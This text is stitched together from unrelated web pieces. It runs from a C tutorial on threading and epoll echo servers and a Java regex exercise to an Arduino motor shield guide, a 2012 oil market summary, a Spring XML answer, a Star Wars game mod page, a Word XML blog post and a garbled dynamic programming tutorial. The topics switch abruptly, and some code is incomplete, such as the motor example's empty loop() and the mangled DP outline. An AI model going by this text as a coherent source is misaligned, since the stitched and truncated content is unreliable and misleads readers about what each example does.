    char response[BUFF_SIZE * 2];
    bzero(response, sizeof(response));
    generate_echo_response(buffer, response);
    int bytes_written = send(client, response, strlen(response), 0);
    if (bytes_written < 0) error_msg("Problem with send call", false);

    close(client);
    return NULL;
} /* detached thread terminates on return */

int main() {
    char buffer[BUFF_SIZE + 1];
    struct sockaddr_in client_addr;
    socklen_t len = sizeof(struct sockaddr_in);

    /* listening socket */
    int sock = create_server_socket(false);

    /* connections */
    while (true) {
        int client = accept(sock, (struct sockaddr*) &client_addr, &len);
        if (client < 0) error_msg("Problem accepting a client request", true);
        announce_client(&client_addr.sin_addr);

        /* client handler */
        pthread_t tid;
        int flag = pthread_create(&tid,          /* id */
                                  NULL,          /* attributes */
                                  handle_client, /* routine */
                                  &client);      /* routine's arg */
        if (flag < 0) error_msg("Problem creating thread", false);
    }
    return 0;
}
The threading_server mimics the division-of-labor strategy in the forking_server, but the client handlers are now threads within a single process instead of forked child processes. This difference is huge. Thanks to COW, separate processes effectively have separate address spaces, but separate threads within a process share one address space.
When a client connects, the threading_server delegates the handling to a new thread:
pthread_create(&tid, /* id */ NULL, /* attributes */ handle_client, /* routine */ &client); /* arg to routine */
The thread gets a unique identifier and executes a thread routine—in this case, handle_client. The threading_server passes the client socket to the thread routine, which reads from and writes to the client.
How could the WordGame be ported to the threading_server? This server must ensure one WordGame instance per client. The single WordGame:
WordGame game; /* one instance */
could become an array of these:
WordGame games[BACKLOG]; /* BACKLOG == max clients */
When a client connects, the threading_server could search for an available game instance and pass this to the client-handling thread:
int game_index = get_open_game(); /* called in main so thread safe */
In the function main, the threading_server would invoke get_open_game, and each client-handling thread then would have access to its own WordGame instance:
games[game_index].socket = client;
pthread_create(&tid,                /* id */
               NULL,                /* attributes */
               handle_client,       /* routine */
               &games[game_index]); /* WordGame arg */
A WordGame local to the thread_routine also would work:
void* handle_client(void* client_ptr) {
  WordGame game; /* local so thread safe */
  /* ... */
}
Each thread gets its own copy of stack-local variables, which are thereby threadsafe. The important point is that the programmer, rather than the system, ensures one WordGame per client.
The threading_server would be more efficient with a thread pool. The pre-forking strategy used in FastCGI for processes extends nicely to threads.
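The pre-created workers could be sketched as a fixed pool of threads pulling jobs off a shared queue guarded by a mutex and condition variables. This is a minimal illustration, not the FastCGI implementation itself; the pool size, queue capacity, and function names are all assumptions.

```c
#include <pthread.h>

#define POOL_SIZE 4
#define QUEUE_CAP 64

typedef struct {
    void (*fn)(void *);
    void *arg;
} job_t;

static job_t queue[QUEUE_CAP];
static int head = 0, tail = 0, count = 0, shutting_down = 0;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t not_empty = PTHREAD_COND_INITIALIZER;
static pthread_cond_t not_full = PTHREAD_COND_INITIALIZER;
static pthread_t workers[POOL_SIZE];

static void *worker(void *unused) {
    (void) unused;
    while (1) {
        pthread_mutex_lock(&lock);
        while (count == 0 && !shutting_down)
            pthread_cond_wait(&not_empty, &lock);
        if (count == 0 && shutting_down) {   /* drained and told to stop */
            pthread_mutex_unlock(&lock);
            return NULL;
        }
        job_t job = queue[head];             /* dequeue one job */
        head = (head + 1) % QUEUE_CAP;
        count--;
        pthread_cond_signal(&not_full);
        pthread_mutex_unlock(&lock);
        job.fn(job.arg);                     /* run the job outside the lock */
    }
}

void pool_start(void) {
    for (int i = 0; i < POOL_SIZE; i++)
        pthread_create(&workers[i], NULL, worker, NULL);
}

void pool_submit(void (*fn)(void *), void *arg) {
    pthread_mutex_lock(&lock);
    while (count == QUEUE_CAP)               /* block when the queue is full */
        pthread_cond_wait(&not_full, &lock);
    queue[tail] = (job_t){ fn, arg };
    tail = (tail + 1) % QUEUE_CAP;
    count++;
    pthread_cond_signal(&not_empty);
    pthread_mutex_unlock(&lock);
}

void pool_shutdown(void) {                   /* waits for queued jobs to finish */
    pthread_mutex_lock(&lock);
    shutting_down = 1;
    pthread_cond_broadcast(&not_empty);
    pthread_mutex_unlock(&lock);
    for (int i = 0; i < POOL_SIZE; i++)
        pthread_join(workers[i], NULL);
}

/* demo: count how many submitted jobs actually ran */
static pthread_mutex_t demo_lock = PTHREAD_MUTEX_INITIALIZER;
static int handled = 0;

static void demo_job(void *arg) {
    (void) arg;
    pthread_mutex_lock(&demo_lock);
    handled++;
    pthread_mutex_unlock(&demo_lock);
}

int pool_demo(int jobs) {
    pool_start();
    for (int i = 0; i < jobs; i++)
        pool_submit(demo_job, NULL);
    pool_shutdown();
    return handled;
}
```

In a server, pool_submit would be called from the accept loop with the client socket as the job argument, so no thread is created per connection.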
A Polling Server
Listing 4 is a polling_server, which resembles the forking_server in some respects and the threading_server in others.
Listing 4. polling_server.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <signal.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <errno.h>
#include "utils.h"

#define MAX_BUFFERS (BACKLOG + 1) /* max clients + listener */

int main() {
  char buffer[BUFF_SIZE + 1];

  /* epoll structures */
  struct epoll_event event,                      /* server2epoll */
                     event_buffers[MAX_BUFFERS]; /* epoll2server */

  int epollfd = epoll_create(MAX_BUFFERS); /* arg just a hint */
  if (epollfd < 0) error_msg("Problem with epoll_create", true);

  struct sockaddr_in client_addr;
  socklen_t len = sizeof(struct sockaddr_in);
  int sock = create_server_socket(true); /* non-blocking */

  /* polling */
  event.events = EPOLLIN | EPOLLET; /* incoming, edge-triggered */
  event.data.fd = sock;             /* register listener */
  if (epoll_ctl(epollfd, EPOLL_CTL_ADD, sock, &event) < 0)
    error_msg("Problem with epoll_ctl call", true);

  /* connections + requests */
  while (true) {
    /* event count */
    int n = epoll_wait(epollfd, event_buffers, MAX_BUFFERS, -1);
    if (n < 0) error_msg("Problem with epoll_wait call", true);

    /* -- If connection, add to polling: may be none or more
       -- If request, read and echo */
    int i;
    for (i = 0; i < n; i++) {
      /* listener? */
      if (event_buffers[i].data.fd == sock) {
        while (true) {
          socklen_t len = sizeof(client_addr);
          int client = accept(sock,
                              (struct sockaddr *) &client_addr,
                              &len);

          /* no client? */
          if (client < 0 && (EAGAIN == errno || EWOULDBLOCK == errno))
            break;

          /* client */
          fcntl(client, F_SETFL, O_NONBLOCK); /* non-blocking */
          event.events = EPOLLIN | EPOLLET;   /* incoming, edge-triggered */
          event.data.fd = client;
          if (epoll_ctl(epollfd, EPOLL_CTL_ADD, client, &event) < 0)
            error_msg("Problem with epoll_ctl ADD call", false);
          announce_client(&client_addr.sin_addr);
        }
      }
      /* request */
      else {
        bzero(buffer, sizeof(buffer));
        int bytes_read = recv(event_buffers[i].data.fd, buffer,
                              sizeof(buffer), 0);

        /* echo request */
        if (bytes_read > 0) {
          char response[BUFF_SIZE * 2];
          bzero(response, sizeof(response));
          generate_echo_response(buffer, response);
          int bytes_written = send(event_buffers[i].data.fd, response,
                                   strlen(response), 0);
          if (bytes_written < 0) error_msg("Problem with send call", false);

          close(event_buffers[i].data.fd); /* epoll stops polling fd */
        }
      }
    }
  }

  return 0;
}
The polling_server is complicated:
while (true)       /* listening loop */
  for (...)        /* event loop */
    if (...)       /* accepting event? */
      while (true) /* accepting loop */
    else           /* request event */
This server executes as one thread in one process and so must support concurrency by jumping quickly from one task (for example, accepting connections) to another (for example, reading requests). These nimble jumps are among nonblocking I/O operations, in particular calls to accept (connections) and recv (requests).
The polling_server's call to accept returns immediately:
If there are no clients waiting to connect, the server moves on to check whether there are requests to read.
If there are waiting clients, the polling_server accepts them in a loop.
The polling_server uses the epoll system library, declaring a single epoll structure and an array of these:
struct epoll_event event,                      /* from server to epoll */
                   event_buffers[MAX_BUFFERS]; /* from epoll to server */
The server uses the single structure to register interest in connections on the listening socket and in requests on the client sockets. The epoll library uses the array of epoll structures to record such events. The division of labor is:
The polling_server registers events of interest with epoll.
The epoll library records detected events in epoll_event structures.
The polling_server handles epoll-detected events.
The polling_server is interested in incoming (EPOLLIN) events and in edge-triggered (EPOLLET) rather than level-triggered events. The distinction comes from digital logic design but examples abound. A red traffic light is a level-triggered event signaling that a vehicle should remain stopped, whereas the transition from green to red is an edge-triggered event signaling that a vehicle should come to a stop. The polling_server is interested in connecting and requesting events when these first occur.
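The difference is observable with a small self-contained program (Linux-only; it uses a pipe in place of a socket for simplicity): an edge-triggered epoll reports readiness once when data arrives, not continuously while data remains unread.

```c
#include <sys/epoll.h>
#include <unistd.h>

/* Returns 1 if edge-triggered semantics behave as described, 0 or -1 otherwise. */
int edge_trigger_demo(void) {
    int fds[2];
    if (pipe(fds) < 0) return -1;

    int epfd = epoll_create(1); /* size arg is only a hint */
    if (epfd < 0) return -1;

    struct epoll_event ev = { .events = EPOLLIN | EPOLLET, .data.fd = fds[0] };
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fds[0], &ev) < 0) return -1;

    struct epoll_event got;
    if (write(fds[1], "x", 1) != 1) return -1; /* edge: empty -> readable */

    int first  = epoll_wait(epfd, &got, 1, 0); /* the edge is reported: 1 */
    int second = epoll_wait(epfd, &got, 1, 0); /* no new edge: 0, even though
                                                  the byte is still unread */
    close(fds[0]); close(fds[1]); close(epfd);
    return first == 1 && second == 0;
}
```

A level-triggered registration (EPOLLIN without EPOLLET) would instead report the descriptor on every wait until the data is drained, which is exactly the red-light versus green-to-red distinction above.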
A for loop iterates through detected events. Above the loop, the statement:
int n = epoll_wait(epollfd, event_buffers, MAX_BUFFERS, -1);
gets an event count, where the events are either connections or requests.
My polling_server takes a shortcut. When the server reads a request, it reads only the bytes then available. Yet the server might require several reads to get the full request; hence, the server should buffer the partials until the request is complete. I leave this fix as an exercise for the reader.
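One way the fix might look: keep a buffer per client and append each recv()'d chunk until the request is complete. The fixed sizes and the newline-terminated protocol below are assumptions for illustration only.

```c
#include <string.h>

#define REQ_MAX 1024

typedef struct {
    char data[REQ_MAX + 1]; /* accumulated request bytes, NUL-terminated */
    size_t used;            /* how many bytes are buffered so far */
} request_buffer;

/* Append one chunk; return 1 once a full (newline-terminated) request
   is buffered, 0 while the request is still partial. */
int buffer_chunk(request_buffer *rb, const char *chunk, size_t n) {
    if (rb->used + n > REQ_MAX)
        n = REQ_MAX - rb->used; /* truncate oversized requests */
    memcpy(rb->data + rb->used, chunk, n);
    rb->used += n;
    rb->data[rb->used] = '\0';
    return strchr(rb->data, '\n') != NULL;
}
```

In the polling_server, one request_buffer would be kept per client descriptor, and the echo would be generated only when buffer_chunk reports a complete request.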
How could the WordGame be ported to the polling_server? This server, like the threading_server, must ensure one WordGame instance per client and must coordinate a client's access to its WordGame. On the upside, the polling_server is single-threaded and thereby threadsafe. Unlike the forking_server, the polling_server does not incur the cost of context switches among forked children.
Conclusions
Which is the best way to handle client concurrency? A reasoned answer must consider traditional multiprocessing and multithreading, together with hybrids of these. The evented I/O way that epoll exemplifies also deserves study. In the end, the selected method must meet the challenges of supporting concurrency across real-world Web applications under real-world conditions.
Resources
The three Web servers together with an iterative_server are available at.
For more on Node.js, see:.
Java String Exercises: Replace each substring of a given string that matches the given regular expression with the given replacement
Java String: Exercise-25 with Solution
Write a Java program to replace each substring of a given string that matches the given regular expression with the given replacement.
Sample string: "The quick brown fox jumps over the lazy dog."
In the above string, replace all occurrences of "fox" with "cat".
Sample Solution:
Java Code:
public class Exercise25 {
    public static void main(String[] args) {
        String str = "The quick brown fox jumps over the lazy dog.";

        // Replace all occurrences of 'fox' with 'cat'.
        String new_str = str.replaceAll("fox", "cat");

        // Display the strings for comparison.
        System.out.println("Original string: " + str);
        System.out.println("New String: " + new_str);
    }
}
Sample Output:
Original string: The quick brown fox jumps over the lazy dog.
New String: The quick brown cat jumps over the lazy dog.
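The solution passes a literal word to replaceAll, but the method's first argument really is a regular expression. A variant that exercises actual regex features might look like this (the class and method names are illustrative, not part of the exercise):

```java
public class RegexReplaceDemo {
    // "\\s+" matches any run of whitespace; each run becomes one space.
    public static String collapseSpaces(String s) {
        return s.replaceAll("\\s+", " ");
    }

    // "\\d" matches a single digit; every digit becomes '#'.
    public static String maskDigits(String s) {
        return s.replaceAll("\\d", "#");
    }

    public static void main(String[] args) {
        System.out.println(collapseSpaces("The   quick\tbrown  fox"));
        System.out.println(maskDigits("Order 66 shipped 2019"));
    }
}
```

Note that metacharacters such as `.` or `$` in the pattern must be escaped (or the literal-minded `String.replace` used instead) when a plain-text replacement is intended.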
Dual Motor TinyShield Tutorial
The Dual Motor Shield allows you to drive two independently controlled DC brushed motors. Create your own tiny robots or drones! Using two of the super miniature but very powerful 2mm x 2mm TI DRV8837 Motor Driver (H-Bridge) IC, this shield will allow for up to 1.8A per channel and operate motors between 1.8 and 11V. This shield includes a built-in motor controller to make driving motors simple using the ATtiny841 Arduino Library.
You can use up to four Motor Shields at a time to use up to eight motors.
All the connections to the motors use standard 0.1″ spaced holes to solder motor leads.
Learn more about the TinyDuino Platform
Note: While the DRV8837 supports 1.8A @ 11V, we highly recommend operating under 500mA @ 5V per channel unless you have some really good heat sinking in place.
Technical Details

TI DRV8837 H-bridge motor driver
- Low MOSFET On-Resistance: HS + LS 280mOhm
- 1.8A Max Drive Current (Recommend 500mA max)
- 1.8V to 11V Motor Operating Supply Voltage Range
- Up to 4 Dual Motor Shields can be stacked together in one Tiny stack; however, the I2C address needs to be different for each Shield. This can be changed with resistors R1 and R2 (more information at the bottom of the page).
- Be sure that your power supply is sufficient to operate these motors as well as your logic – batteries work the best. If you are running both the motors and the logic off of one power supply, we recommend avoiding using a switching power supply as the transients caused can potentially damage items connected to the logic side.
- You do not have to use motors with JST connectors, the board comes in two variations depending on your needs so that you can solder your own motors. The board variation with the JST connectors makes it easy to connect the motors fast without needing soldering equipment.
Materials
Hardware
- TinyDuino and USB TinyShield OR
- Dual Motor TinyShield (with or without JST connectors, depending on the motors you use)
- Motors: there are a few options: 200:1 Gear Reduction Motor (which will have higher torque) and the 30:1 Gear Reduction Motor (which will have higher speed)
- Micro USB Cable
Software
Hardware Assembly
Connect your processor board of choice to your Dual Motor Shield using the 32 pin tan connectors. Then plug in the battery and the motor(s) to your Motor Shield.
If you selected the Dual Motor Shield without the JST pin connectors, you will need to solder the motors of your choice to the board. The ground pin is noted in the silkscreen on the board with a line parallel to the pads. In other words, solder the black (GND) wire to the left, marked through-hole point, and the red (POWER) wire to the right, unmarked through-hole point. Although the red-and-black color scheme is an industry standard, the wire colors on your motors may be different. Always consult component documentation before soldering.
NOTE: In order for the motors to have enough power to move, there must be an external power supply. Here, we use a battery.
Software Setup
You need the ATtiny841 library in order to use the example program in this tutorial. A zip file of the library is included under the Software Materials. To install an Arduino library, check out our Library Installation Page.
Open the Basic Motor Example program in the Arduino IDE, plug your TinyDuino stack into your PC using the MicroUSB cable, ensure your Tools selections are correct for your processor board, and click the upload button.
Code
//-------------------------------------------------------------------------------
// TinyCircuits Dual Motor Driver Basic Example
// Last modified 24 Feb 2020
//-------------------------------------------------------------------------------

#include <Wire.h>
#include <MotorDriver.h>

// The constructor value affects the I2C address, which can be changed by
// removing resistors R1 or R2. Then the corresponding R1_REMOVED,
// R2_REMOVED, or R1_R2_REMOVED can be set. Default is NO_R_REMOVED.
MotorDriver motor(NO_R_REMOVED);

#if defined(ARDUINO_ARCH_AVR)
#define SerialMonitorInterface Serial
#elif defined(ARDUINO_ARCH_SAMD)
#define SerialMonitorInterface SerialUSB
#endif

int maxPWM = 1000;
int steps = 10;
int stepSize = maxPWM / steps;

void setup() {
  SerialMonitorInterface.begin(9600);
  Wire.begin();
  // This will block until the Serial Monitor is opened on the
  // TinyScreen+/TinyZero platform!
  while (!SerialMonitorInterface);
  // The value passed to begin() is the maximum PWM value, which is
  // 16 bit (up to 65535). This value also determines the output
  // frequency: by default, 8MHz divided by the maxPWM value.
  if (motor.begin(maxPWM)) {
    SerialMonitorInterface.println("Motor driver not detected!");
    while (1);
  }
}

void loop() {
  // Step each motor up and down through its PWM range here.
}
Once the program is uploaded to the board, open up your Serial Monitor (you can find this under the Tools tab, or magnifying glass icon in the top right of the Arduino IDE), and then you should see your motors moving back and forth. If you want the motors to begin moving as soon as the program is uploaded and power is connected, you can comment out the line:
//while(!SerialMonitorInterface)
in the setup() function.
More Motors?!
If you want to add more motors to your project, you can do that! All you have to do is remove some address resistors noted on the board in order to use other, non-conflicting I2C addresses. You can use up to four different Dual Motor Shields at a time. You may see the line in the program noted:
MotorDriver motor(NO_R_REMOVED); // Default address with no Resistors removed
To add more motor objects for different Shields, you need to initialize the motor objects with different I2C addresses as well as removing the respective address resistors on the boards:
MotorDriver motor2(R1_REMOVED); // Add a second Dual Motor TinyShield by removing resistor R1
MotorDriver motor3(R2_REMOVED); // Add a third Dual Motor TinyShield by removing resistor R2
MotorDriver motor4(R1_R2_REMOVED); // Add a fourth Dual Motor TinyShield by removing resistors R1 and R2
Now get out there and make something move!
Downloads
If you have any questions or feedback, feel free to email us or make a post on our forum. Show us what you make by tagging @TinyCircuits on Instagram, Twitter, or Facebook so we can feature it.
Thanks for making with us!
This is a minimalist tool to run multiple parallel tasks in python.
Most programming languages have full support for threads but often require a lot of overhead work even for the simplest tasks. This package aims to provide an easy way to parallelize these tasks with very little effort.
First install the package.
pip install mparallel
In your python modules, just import it and use it as follows:
import time
import mparallel

def some_expensive_or_waiting_task(some_param):
    # ... simulate an expensive or blocking task
    time.sleep(2)
    return some_param

def my_method():
    runner = mparallel.Runner()
    for i in range(10):
        runner.add_task(some_expensive_or_waiting_task, i)
    print(runner.results())
You can see from the previous code that the tasks run in parallel: even though they are started in order (0..9), the final output will likely appear in a different order. Also, the total waiting time will be well under the 20 seconds it would take to run them serially.
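The Runner API above comes from the package description; the same pattern can be sketched with the standard library's concurrent.futures, which also demonstrates the out-of-order completion behavior:

```python
import concurrent.futures
import time

def some_expensive_or_waiting_task(some_param):
    time.sleep(0.1)  # stand-in for real work
    return some_param

def run_all(n):
    # Submit every task up front; as_completed yields results as they finish,
    # so the order generally differs from the submission order.
    with concurrent.futures.ThreadPoolExecutor() as pool:
        futures = [pool.submit(some_expensive_or_waiting_task, i)
                   for i in range(n)]
        return [f.result() for f in concurrent.futures.as_completed(futures)]

print(sorted(run_all(10)))
```

As with mparallel, the total wall-clock time is bounded by the slowest batch of concurrent tasks rather than the sum of all task durations.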
13 September 2012 12:00 [Source: ICIS news]
LONDON (ICIS)--Here is Thursday’s midday European oil and chemical market summary from ICIS.
CRUDE: October WTI: $97.10/bbl, up 9 cents/bbl. October BRENT: $116.10/bbl, up 14 cents/bbl
Crude prices were showing small gains as traders awaited the announcement from the US Federal Reserve later in the day on its plans for further stimulus to boost the US economy.
NAPHTHA: $989-991/tonne, down $11/tonne
The cargo range lost ground from Wednesday afternoon as a result of a weaker crack spread. October swaps were assessed at $973-974/tonne.
BENZENE: $1,480-1,530/tonne, down $20/tonne on the sell side
September offers were lower at $1,530/tonne this morning but there were no firm corresponding bids. October was offered at $1,390/tonne while the first half of the month was still at a sharp premium, with offers at $1,490/tonne and no firm bids.
STYRENE: $1,730-1,780/tonne, down $10-20/tonne
Offers for September were at $1,780/tonne this morning and the range was assessed lower following a spike seen in recent days. October was backwardated with offers at $1,760
What is the difference between:

<property name="prefix" value="/WEB-INF/jsp/"/>

and

p:prefix="/WEB-INF/jsp/"

?
Basically, either version is acceptable (in Netbeans or any other development environment) as they are just two different alternatives to do the same thing. The only requirement is that for the second version, the "p:" namespace prefix needs to be declared in your top level "beans" xml element.
So yeah, you can choose whichever way you are happier with.
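To make the equivalence concrete, here is a sketch of both forms in one file. The view-resolver class is a typical example chosen for illustration; the essential detail is the xmlns:p declaration on the top-level beans element:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:p="http://www.springframework.org/schema/p"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
           http://www.springframework.org/schema/beans/spring-beans.xsd">

    <!-- verbose form: a nested property element -->
    <bean id="viewResolverA"
          class="org.springframework.web.servlet.view.InternalResourceViewResolver">
        <property name="prefix" value="/WEB-INF/jsp/"/>
    </bean>

    <!-- shorthand form: the p namespace turns each property into an attribute -->
    <bean id="viewResolverB"
          class="org.springframework.web.servlet.view.InternalResourceViewResolver"
          p:prefix="/WEB-INF/jsp/"/>

</beans>
```

Both beans end up with the same prefix value; the p: form is purely syntactic sugar resolved by Spring's XML parser.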
Note, I do realise that there are other differences in the two xml snippets above (the bean's class and the viewClass property). If that is what you are referring to, then there really isn't a path to translate the first into the second, they are two different (albeit very similar) things.
If I have missed the point somewhere, can you please elaborate!
This is patch 3 for versions 1.06d and 1.06e. You may wonder why this patch covers both versions: it works with both, and the only difference is that the new scenarios adding the Star Wars Galaxy are a feature only of 1.06e.
Another point: the new scenarios probably run with game versions before 1.06d, but never with 1.06d.
To help you download the mod, I have marked as Old-Obsolete the versions you do not need if you have the game updated to the latest 1.06e.
The latest versions are marked as Active.
The DLC Lumens is only necessary if you want to play as the First Order or against that faction.
These are the additions in patch 3:
-Cell improvements.
-Ship improvements.
-Improved descriptions.
-First Order can build all the ground units.
-New Galaxy scenarios added.
-Small fixes and improvements in other files.
-Additions from previous patches.
Now, you will need these things if you want to play the mod.
Moddb.com
+
Moddb.com
This is the basic installation.
-Uncompress the mod with WinRAR in the main game folder.
-Find the file REMEMBER.CFG inside the new folder named Polaris_Sector_Alliance and cut it, then paste the file into the folder ..\Documents\My Games\Polaris Sector\.. , overwriting the file there.
-Launch the game. Remember, this version of the mod is only translated to English. You must select English in the game settings.
-Mod uninstall: open the file REMEMBER.CFG in the folder ..\Documents\My Games\Polaris Sector\.. and replace the line CurrentModPath "Polaris_Sector_Alliance/" with //CurrentModPath "Polaris_Sector_Alliance/"
The mod includes a complete list of credits if you want to know about them.
Polaris Sector Alliance 1.0b converts the new 4x game from Slitherine into a Star Wars 4x game very similar in concept to the old SW Rebellion game but...
Polaris Sector is a new 4x game created by Softwarware and published by Slitherine. This game has a lot of potential and two very good features.
Polaris Sector 1.06e - Alliance mod patch 5 for the Polaris Sector Alliance 1.06d&1.06e by Nomada_Firefox This is a small patch for people which they...
Polaris Sector 1.06e - Alliance mod patch 5 for the Polaris Sector Alliance 1.06d&1.06e by Nomada_Firefox This is a small patch for the mod main file...
Polaris Sector 1.06e - Alliance mod patch 4 for the Polaris Sector Alliance 1.06d&1.06e by Nomada_Firefox This is a small patch for the mod main file...
Polaris Sector 1.06e - Alliance mod patch 3 for the Polaris Sector Alliance 1.06d&1.06e by Nomada_Firefox This is a small patch for the mod main file...
This file adds new scenario Galaxies for the mod, just uncompress it in the folder where you installed the Polaris Sector Alliance overwritting all files...
A small patch to improve the First Order ships in battle and some other small things. Just overwrite the mod content with the files inside.

Why does the Star Wars galaxy only have two races to select? How can I change this? Thanks
Edit: I just downloaded the SWGalaxies maps, and the Star Wars galaxy ER says 100 stars, 8 races, but no races appear
Hi, I have the latest version installed and found a small bug.
When playing as the Imperials I unlocked Fighters LvL2 and got the TIE Interceptor and TIE Advanced MK2/Avenger unlocked. The only problem is, one of the weapon pylon slots on the TIE Avenger seems to be 1 pixel too short. It's the right lower pylon (on the second deck, so to say)... so I can only build in 5 of the possible 6 small pylons.
If its not a big hassle, can you provide a hotfix for it? Or at least tell me how I can fix it myself? ^^ One of those would be great... I will pause my game till I can use those Avengers in their full glory. Thanks for this awesome mod :-)
Any troubleshotting question. Go to my site Firefoxccmods.com
Blocked at my site? send me a private message with your ip.
This comment is currently awaiting admin approval, join now to view.
Well, in case you have not checked: a new game update was launched, the 1.06e. Probably the last version of the mod will work with it. However, I will make an update sooner or later, more probably later, because I want to add some things, such as a new customized Star Wars Galaxy. With a bit of luck, I can make it.
Wow, man! Thanks for the hard work. I am downloading right now and this mod looks awesome!
It def is a lot of fun!
I really enjoy playing your mod, thank you for all your hard work. I have been addicted to the game since I downloaded it, lol. Is this the final version, or are you adding more stuff in the future?
Final would be more correct.
Nomada_Firefox, where can I find the patch? I don't have the game purchased.
Could you share the 1.04 patch for the mod?
Please buy the game. I do not give support to anyone who uses a pirated copy.
Intro to Word XML Part 5: Opening custom XML files
I've been talking for a while now about the support for custom defined schemas in Office. I'm actually going to pull together a post in the next week or so that addresses the uses and motivations behind the XML support we have in Office. We talk about XML a lot, and it should be clear by now that there are a ton of uses. From an Office point of view, there is no such thing as a single "XML editor", but instead a collection of tools that use XML to improve the power of their scenarios. Word can open generic XML, but that doesn't mean it should be used as a generic XML editor. It wouldn't really make sense to open Excel's XML in Word, since SpreadsheetML is used to describe a spreadsheet, and would be fairly difficult to edit in a Word processor. Of course Word and Excel both have a collection of shared functionality, but those are subsets of the larger overall set of functionality in each application. I plan to address this in more detail soon because I think it's really important to understand this when you are exploring the XML functionality and trying to determine what tools best suit your scenarios.
For today, though, let's talk about generic XML editing in Word. You can open any XML file you want in Word, and depending on how you set Word up, you can even teach Word to display your XML in a rich way. In part 3, I showed how you could create a WordprocessingML file that had your own XML in it as well. If you start with an XML file that is just made up of your XML, you can create an XSLT that will teach Word how to display your XML.
Let's start with a basic XML file:
<?xml version="1.0"?>
<s:employee xmlns:s="urn:example:employees">
  <s:name>Brian Jones</s:name>
  <s:occupation>Program Manager</s:occupation>
</s:employee>
Try opening that file in Word. The result should be that you get a simple text document with your tags showing. This gives the appearance that Word is able to internally open any XML file. That's actually not quite what's going on. It's really more similar to what happens when you open an XML file in IE without applying a transform. Word sees that the XML is not in its namespace, so it looks to see if there is a transform specified. If there isn't a transform, Word will fall back to using a default XSLT that transforms into WordprocessingML. The transform that we use is found in the programs folder: c:\Program Files\Microsoft Office\OFFICE11\XML2WORD.XSL
Go ahead and open that file up. You'll see that we map custom XML into a hybrid of WordprocessingML and the custom XML. We apply some indentation based on how deeply the tags are nested, which gives you that tree-view-like appearance. We also specify that the XML tag view should be on, just like we did in the example I posted in part 3 of the intro to Word XML. Also notice that we create this tag: <w:removeWordSchemaOnSave w:val="on"/>. That tells Word that when the user hits the save button, the document should be saved as "data only", which removes the WordprocessingML. That's why you can open any generic XML file, make some edits, and just press save.
Now, what I've just described doesn't exactly fit with what our goals were for the XML support in Word. We weren't trying to make Word into a generic XML editor. Our main goals were to make it much easier for people to build solutions in Word that were document based solutions. Word is a document editor, and by adding XML support to Word, the solutions you build become easier and more powerful. Visual Studio is really a better example of a generic XML editor.
If you want to open your XML data in Word and have it formatted in a richer way than the default XSLT provides (which is probably almost always the case), then you can generate an XSLT. Let's say that we want to format this custom XML to look the same as the file looked that we built in part 3 of the intro to Word XML. We would just need to create an XSLT that output that same WordprocessingML. The XSLT would look something like this:
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml"
    xmlns:s="urn:example:employees">
  <xsl:template match="/">
    <w:wordDocument>
      <w:docPr>
        <w:showXMLTags w:val="off"/>
      </w:docPr>
      <xsl:apply-templates/>
    </w:wordDocument>
  </xsl:template>
  <xsl:template match="s:employee">
    <w:body>
      <s:employee>
        <w:p>
          <w:r>
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:t xml:space="preserve">Name: </w:t>
          </w:r>
          <s:name>
            <w:r>
              <w:t><xsl:value-of select="s:name"/></w:t>
            </w:r>
          </s:name>
        </w:p>
        <w:p>
          <w:r>
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:t xml:space="preserve">Occupation: </w:t>
          </w:r>
          <s:occupation>
            <w:r>
              <w:t><xsl:value-of select="s:occupation"/></w:t>
            </w:r>
          </s:occupation>
        </w:p>
      </s:employee>
    </w:body>
  </xsl:template>
</xsl:stylesheet>
Save that XSLT file onto your machine and now open the custom XML file again in Word. Notice the task pane on the right called the "XML Document" pane. You can see that the "Data only" transform was applied, but you can choose to browse for a different one. Choose "Browse..." and find the XSLT file we just created. The XSLT should now be applied, and you should have a file that looks really similar to the one we created the other week. We specified that the XML tag view should be off, but you can turn the tags back on by pressing "CTRL + Shift + X".
There's a simple example of creating an XSLT. You can now play around with changing properties in the XSLT so that the data is displayed in different ways.
-Brian
Catalogue

1. Maximum sum of continuous subarrays
2. Divide and conquer (official solution: segment tree)
3. Dynamic programming + temporary variables
4. Dynamic programming + in-place modification
    1. Dynamic programming + 2D array
    2. Optimization: add an extra row and column of zeros

Dynamic programming

1. Maximum sum of continuous subarrays

Jianzhi Offer 42. Maximum sum of continuous subarrays

1. Brute force

2. Divide and conquer (official solution: segment tree)
This divide-and-conquer method is similar to the pushUp operation used when solving the longest common ascending subsequence problem with a segment tree. If you have not yet encountered segment trees, don't worry: this section assumes no segment-tree background. If you are interested, though, it is worth reading about segment-tree interval merging, which solves frequently asked problems such as the interval longest continuous rising sequence and the interval maximum subsegment sum.
First define an operation get(a, l, r) that returns the maximum subsegment sum of the sequence a over the interval [l, r]; the final answer is then get(nums, 0, nums.length - 1). How can this operation be implemented by divide and conquer?
For an interval [l, r], take m = ⌊(l+r)/2⌋ and solve the subintervals [l, m] and [m+1, r] recursively. The recursion deepens layer by layer until the interval length shrinks to one, and then "picks back up". At that point, consider how to combine the information of the interval [l, m] and the interval [m+1, r] into information about the interval [l, r]. The two most critical questions are:
- What information do you want to maintain?
- How do you combine this information?
For an interval [l, r], we can maintain four quantities:

- lSum: the maximum subsegment sum of [l, r] whose left endpoint is l
- rSum: the maximum subsegment sum of [l, r] whose right endpoint is r
- mSum: the maximum subsegment sum of [l, r]
- iSum: the sum of the whole interval [l, r]
In what follows, [l, m] is the left subinterval and [m+1, r] the right subinterval of [l, r]. How do we combine the quantities of the left and right subintervals into the quantities of [l, r]?

For an interval [i, i] of length one, all four quantities equal nums[i]. For intervals of length greater than one:

- iSum is the easiest to maintain: the iSum of [l, r] equals the iSum of the left subinterval plus the iSum of the right subinterval.
